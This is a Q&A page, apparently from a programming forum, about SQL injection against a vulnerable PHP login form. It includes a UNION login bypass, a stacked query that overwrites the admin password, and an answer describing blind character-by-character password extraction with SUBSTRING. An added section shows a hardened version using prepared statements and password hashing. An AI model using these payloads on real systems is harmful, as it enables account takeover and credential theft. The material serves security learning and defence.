How To Extract Information On Login using SQL Injection?

This is the back-end PHP code where I will test the vulnerability.

if(isset($_POST["login"]) && isset($_POST["password"])){

    $login = $_POST["login"];
    $password = $_POST["password"];

    // user input is concatenated directly into the query text
    $sql="SELECT * FROM users WHERE login='$login' AND password='$password'";

    $result= mysqli_query($conn, $sql);

    if(mysqli_num_rows($result) != 0){

        echo "<h1>Login Success!</h1>";

        $row = mysqli_fetch_array($result);
        extract($row);

        echo "Welcome , ".$login;
    }
}

This is the code I will inject into the login field.

' UNION SELECT * FROM users -- 

It seems I am able to log in, but what should I do to have the passwords displayed in an error message or anywhere on the web page once the injection is made?

Like, what query do you guys recommend appending to the code to extract passwords, database information, all tables, etc.?

Do take note I have limited SQL Knowledge so I might not know any queries to do the trick.

Assuming the back-end or server-side PHP code also accepts multi-query execution, I would like to know how I can extract passwords via multi-query injection too.

Something like the code below, with which I can update a user's details (assuming I know there is an admin user) when I input it into the login field:

' OR 1 = 1; UPDATE users SET password='stackOverFlow' WHERE login='admin' -- 

Please recommend both solutions for displaying passwords or other useful information on the web page using only code injection in the login fields (not URL injection): one for when the server can execute multiple SQL queries and one for when it cannot.
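For comparison, here is the same login check written so that the injected strings above are treated as data rather than SQL. This is an added example, not code from the question; it assumes the `$conn` mysqli connection from the original snippet and a `password_hash` column holding output of `password_hash()` instead of clear-text passwords.

```php
<?php
// Added example: hardened version of the login check from the question.
// Assumes $conn is an open mysqli connection and that users.password_hash
// stores values produced by password_hash() (both are assumptions).
if (isset($_POST["login"], $_POST["password"])) {
    $login    = $_POST["login"];
    $password = $_POST["password"];

    // The ? placeholder keeps the input out of the SQL text, so a value such as
    // ' UNION SELECT * FROM users --  is compared literally against the login
    // column instead of being parsed as part of the statement.
    $stmt = mysqli_prepare($conn, "SELECT password_hash FROM users WHERE login = ?");
    if ($stmt === false) {
        http_response_code(500);
        exit("Login temporarily unavailable.");
    }
    mysqli_stmt_bind_param($stmt, "s", $login);
    mysqli_stmt_execute($stmt);
    mysqli_stmt_bind_result($stmt, $storedHash);
    $found = mysqli_stmt_fetch($stmt) === true;
    mysqli_stmt_close($stmt);

    // password_verify() checks the submitted password against the stored hash,
    // so the table holds nothing that could be read back character by character.
    if ($found && password_verify($password, $storedHash)) {
        echo "<h1>Login Success!</h1>";
        // Escape the echoed login so it cannot inject HTML into the page.
        echo "Welcome, " . htmlspecialchars($login, ENT_QUOTES, "UTF-8");
    } else {
        // One generic message for both "unknown user" and "wrong password".
        echo "Login failed.";
    }
}
```

A prepared statement carries exactly one SQL statement, so the stacked `; UPDATE users ...` from the question is rejected as well; the `mysqli_num_rows($result) != 0` check is replaced by a real password comparison, which is what the original `UNION` bypass relied on being absent.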


Answer

  1. You can send the input many times, changing 'a' to 'z':

    ' union select * from user where login='admin' and SUBSTRING(password, 1, 1)='a' --
    
  2. When login succeeds, the first character of the password is the character from 'a' to 'z' you sent.

  3. Loop through step 1, changing SUBSTRING(password, 1, 1) to SUBSTRING(password, 2, 1) to detect the second character of the password.

User contributions licensed under: CC BY-SA